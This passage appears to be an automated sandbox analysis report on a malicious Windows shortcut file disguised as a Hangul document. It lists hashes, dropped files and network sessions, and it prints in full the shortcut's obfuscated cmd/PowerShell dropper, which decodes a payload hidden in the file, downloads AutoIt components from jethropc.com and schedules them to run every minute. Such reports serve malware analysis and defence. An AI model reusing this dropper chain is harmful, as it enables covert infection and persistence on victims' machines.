                • 162.241.216.65
                23-April-24-ACH-7fa67756.jarGet hashmaliciousUnknownBrowse
                • 162.241.216.65
                New Soft Update.exeGet hashmaliciousUnknownBrowse
                • 162.241.216.65
                u2.batGet hashmaliciousBazar Loader, QbotBrowse
                • 162.241.216.65
                SecuriteInfo.com.Python.Stealer.1447.10844.3562.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                • 162.241.216.65
                4PPlLk8IT5.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                • 162.241.216.65
                SecuriteInfo.com.Trojan.GenericKD.72333858.1744.9991.exeGet hashmaliciousUnknownBrowse
                • 162.241.216.65
                pRcbxPdooL.exeGet hashmaliciousUnknownBrowse
                • 162.241.216.65
                Payslip-9583.exeGet hashmaliciousUnknownBrowse
                • 162.241.216.65
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\GSlLzFnTov\GSlLzFnTov.exeJ-JeremieKarg-78462.jsGet hashmaliciousUnknownBrowse
                  J-JeremieKarg-78462.jsGet hashmaliciousUnknownBrowse
                    5cc2ecc53d742b200482b633d471df19bdf979796e8289d89f50cea2.vbsGet hashmaliciousDarkGateBrowse
                      6a7c258b33be34d613ad96e19665ce25bee7eefcf55204640682d6cc.vbsGet hashmaliciousDarkGateBrowse
                        Efz.vbsGet hashmaliciousUnknownBrowse
                          Process:C:\Windows\System32\cmd.exe
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):530944
                          Entropy (8bit):6.426002179912066
                          Encrypted:false
                          SSDEEP:12288:fY/9QPTCgxPjg26sSS4x0WZ40lNYgBOJDN3NlhBATWStJ:geLCY0mSSxWG0lN1O7rA6StJ
                          MD5:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                          SHA1:C9ECDE4DE3C60F99C69BBCA4332F4162E0BF252F
                          SHA-256:D76D08C04DFA434DE033CA220456B5B87E6B3F0108667BD61304142C54ADDBE4
                          SHA-512:1B04B40D36B6CDCB805C720341A21885594B9C7BAEAD0A6CC56E7F6CC1ACDFDB2522C12276B0973EAF2911A6D2A105DEFC27D48E574A6F87A11BFACCACF65E3F
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          • Antivirus: Virustotal, Detection: 0%, Browse
                          Joe Sandbox View:
                          • Filename: J-JeremieKarg-78462.js, Detection: malicious, Browse
                          • Filename: J-JeremieKarg-78462.js, Detection: malicious, Browse
                          • Filename: 5cc2ecc53d742b200482b633d471df19bdf979796e8289d89f50cea2.vbs, Detection: malicious, Browse
                          • Filename: 6a7c258b33be34d613ad96e19665ce25bee7eefcf55204640682d6cc.vbs, Detection: malicious, Browse
                          • Filename: Efz.vbs, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.{MPq(MPq(MPq(+?.(FPq(.%t)kPq(.%u)BPq(.%r)GPq(D(.(.Pq(>2p)DPq(MPp(.Pq(.%y).Pq(.%.(LPq(.%s)LPq(RichMPq(........PE..d...J.~b.........."..........\.................@.............................`......[.....`.................................................H...4....@..@........(...........P..........T..............................8............................................text............................... ..`.rdata..............................@..@.data...`...........................@....pdata...(.......*..................@..@_RDATA.......0......................@..@.rsrc...@....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):0.34726597513537405
                          Encrypted:false
                          SSDEEP:3:Nlll:Nll
                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                          Malicious:false
                          Preview:@...e...........................................................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:Hangul (Korean) Word Processor File 5.x
                          Category:dropped
                          Size (bytes):27648
                          Entropy (8bit):6.8136714705106085
                          Encrypted:false
                          SSDEEP:384:n69Cjzy09JsOlg9IQSMnOpIQ5Rtn1JfzwtIhJ4mcRwGmYdHdevG:2Cjz3JFlg9NOpnRtnDfyIhiR6
                          MD5:F092754547BBEAD9D23EFF09F6193A01
                          SHA1:13779CECB25031B721FAC453EFD8762F2F54DAF7
                          SHA-256:A5B2971F5651589FE2F214C66DF32FF5350892975A97239EBF2FB81E08B58D77
                          SHA-512:3F8A382DB440B0729760595CC1974EE71BF8126383AF9CE92F5CA7E9D85E3788CF20B8C7860FEC2B8FE29F5344263DCFDB614560A939A0B94355DE3C1C8D0E2B
                          Malicious:false
                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\GSlLzFnTov\GSlLzFnTov.exe
                          File Type:ASCII text, with CR, LF line terminators
                          Category:dropped
                          Size (bytes):478
                          Entropy (8bit):2.729127576381513
                          Encrypted:false
                          SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdivIddivIddivIdYn:Vz6ykymUexb1U9cddddddYn
                          MD5:511CC06AC43E809AF9D1B85DA54FEA7B
                          SHA1:BB215B0FED81B2EA14E77CEF1A49A7D4E403F615
                          SHA-256:BC073B4151937AD142E6FBA4515388914A9FE5485D2057F3C72BE9DCA79152AF
                          SHA-512:6B805AB7544E8EDE14FEDDD02E6BF527A6130E916FDCFC702CBFADB25C53AB475CD78FE231DAA25AAB5DA0C6E75B612E4DF31654673FBF4AE772D02A0E963681
                          Malicious:false
                          Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0..
                          File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=0, Archive, ctime=Mon Dec 25 10:39:35 2023, mtime=Mon Apr 8 13:10:10 2024, atime=Mon Dec 25 10:39:35 2023, length=245248, window=hidenormalshowminimized
                          Entropy (8bit):7.827246167977947
                          TrID:
                          • Windows Shortcut (20020/1) 100.00%
                          File name:knfV5IVjEV.lnk
                          File size:140'094 bytes
                          MD5:9d6c79c0b395cceb83662aa3f7ed0123
                          SHA1:65f5f7d127c478522e9669200de20000edcb6cfb
                          SHA256:2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
                          SHA512:8b297035ec18aaaba7165d5bc0955ab814f17a49ca27f3723ba5dfbae5115f4d25e786dba5533ecc2ed9a7509a12d5613d2bee34d00e499a6c54f116dd6136a2
                          SSDEEP:3072:cxOao9p2xillZplcllOBllrlllllllilYllllllllIZyto3TnuYog8NPfNxvyK0l:4Zgo3Tu/gaFxaixVfIn2c
                          TLSH:D7D3F1D25AFE9300E5D54732A8A409B2C86BBC231ABA6E4CF18E17355F8D701C8A3775
                          File Content Preview:L..................F.... ....:..'7...J.w.....:..'7..........................5....P.O. .:i.....+00.../C:\...................V.1......X.J..Windows.@........T,*.X.r..........................z...W.i.n.d.o.w.s.....Z.1......X.L..System32..B........T,*.X.o......
                          Icon Hash:74f0e4e4e4e1e1ed

                          General

                          Relative Path:
                          Command Line Argument:/c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
                          Icon location:.hwp
                          TimestampSource PortDest PortSource IPDest IP
                          Apr 24, 2024 03:02:20.443732023 CEST49703443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:20.443783998 CEST44349703162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:20.443840981 CEST49703443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:20.457456112 CEST49703443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:20.457482100 CEST44349703162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:20.849915028 CEST44349703162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:20.849987030 CEST49703443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:20.853857994 CEST49703443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:20.853868008 CEST44349703162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:20.854338884 CEST44349703162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:20.860976934 CEST49703443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:20.908123016 CEST44349703162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:22.067953110 CEST44349703162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:22.068169117 CEST44349703162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:22.068236113 CEST49703443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:22.085608959 CEST49703443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:22.085642099 CEST44349703162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:22.278222084 CEST49706443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:22.278259993 CEST44349706162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:22.278321981 CEST49706443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:22.287002087 CEST49706443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:22.287022114 CEST44349706162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:22.665276051 CEST44349706162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:22.665358067 CEST49706443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:22.666834116 CEST49706443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:22.666841030 CEST44349706162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:22.667665005 CEST44349706162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:22.670188904 CEST49706443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:22.716114998 CEST44349706162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:24.044980049 CEST44349706162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:24.045047998 CEST44349706162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:24.045115948 CEST49706443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:24.153750896 CEST49706443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:24.153779984 CEST44349706162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:26.751122952 CEST49709443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:26.751171112 CEST44349709162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:26.751254082 CEST49709443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:26.759114981 CEST49709443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:26.759130955 CEST44349709162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:27.130110979 CEST44349709162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:27.130260944 CEST49709443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:27.133626938 CEST49709443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:27.133645058 CEST44349709162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:27.134035110 CEST44349709162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:27.146239996 CEST49709443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:27.192118883 CEST44349709162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:28.717185974 CEST44349709162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:28.717489958 CEST44349709162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:28.717546940 CEST49709443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:28.733779907 CEST49709443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:28.733819008 CEST44349709162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:29.107211113 CEST49713443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:29.107260942 CEST44349713162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:29.107352972 CEST49713443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:29.114727974 CEST49713443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:29.114746094 CEST44349713162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:29.484441996 CEST44349713162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:29.484556913 CEST49713443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:29.485918045 CEST49713443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:29.485928059 CEST44349713162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:29.486629963 CEST44349713162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:29.489845991 CEST49713443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:29.536113977 CEST44349713162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:30.858454943 CEST44349713162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:30.858817101 CEST44349713162.241.216.65192.168.2.10
                          Apr 24, 2024 03:02:30.859482050 CEST49713443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:30.883124113 CEST49713443192.168.2.10162.241.216.65
                          Apr 24, 2024 03:02:30.883141994 CEST44349713162.241.216.65192.168.2.10
                          TimestampSource PortDest PortSource IPDest IP
                          Apr 24, 2024 03:02:20.233855009 CEST5740353192.168.2.101.1.1.1
                          Apr 24, 2024 03:02:20.438576937 CEST53574031.1.1.1192.168.2.10
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Apr 24, 2024 03:02:20.233855009 CEST192.168.2.101.1.1.10xd5c8Standard query (0)jethropc.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Apr 24, 2024 03:02:20.438576937 CEST1.1.1.1192.168.2.100xd5c8No error (0)jethropc.com162.241.216.65A (IP address)IN (0x0001)false
                          • jethropc.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.1049703162.241.216.654437848C:\GSlLzFnTov\GSlLzFnTov.exe
                          TimestampBytes transferredDirectionData
                          2024-04-24 01:02:20 UTC120OUTGET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1
                          Host: jethropc.com
                          User-Agent: curl/7.83.1
                          Accept: */*
                          2024-04-24 01:02:22 UTC273INHTTP/1.1 200 OK
                          Date: Wed, 24 Apr 2024 01:02:21 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                          X-Endurance-Cache-Level: 0
                          X-nginx-cache: WordPress
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.1049706162.241.216.654437884C:\GSlLzFnTov\GSlLzFnTov.exe
                          TimestampBytes transferredDirectionData
                          2024-04-24 01:02:22 UTC120OUTGET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1
                          Host: jethropc.com
                          User-Agent: curl/7.83.1
                          Accept: */*
                          2024-04-24 01:02:24 UTC273INHTTP/1.1 200 OK
                          Date: Wed, 24 Apr 2024 01:02:22 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                          X-Endurance-Cache-Level: 0
                          X-nginx-cache: WordPress
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.1049709162.241.216.654437980C:\GSlLzFnTov\GSlLzFnTov.exe
                          TimestampBytes transferredDirectionData
                          2024-04-24 01:02:27 UTC120OUTGET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1
                          Host: jethropc.com
                          User-Agent: curl/7.83.1
                          Accept: */*
                          2024-04-24 01:02:28 UTC273INHTTP/1.1 200 OK
                          Date: Wed, 24 Apr 2024 01:02:27 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                          X-Endurance-Cache-Level: 0
                          X-nginx-cache: WordPress
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.1049713162.241.216.654438092C:\GSlLzFnTov\GSlLzFnTov.exe
                          TimestampBytes transferredDirectionData
                          2024-04-24 01:02:29 UTC120OUTGET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1
                          Host: jethropc.com
                          User-Agent: curl/7.83.1
                          Accept: */*
                          2024-04-24 01:02:30 UTC273INHTTP/1.1 200 OK
                          Date: Wed, 24 Apr 2024 01:02:29 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, close
                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                          X-Endurance-Cache-Level: 0
                          X-nginx-cache: WordPress
                          Content-Length: 0
                          Content-Type: text/html; charset=UTF-8


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:1
                          Start time:03:02:08
                          Start date:24/04/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr 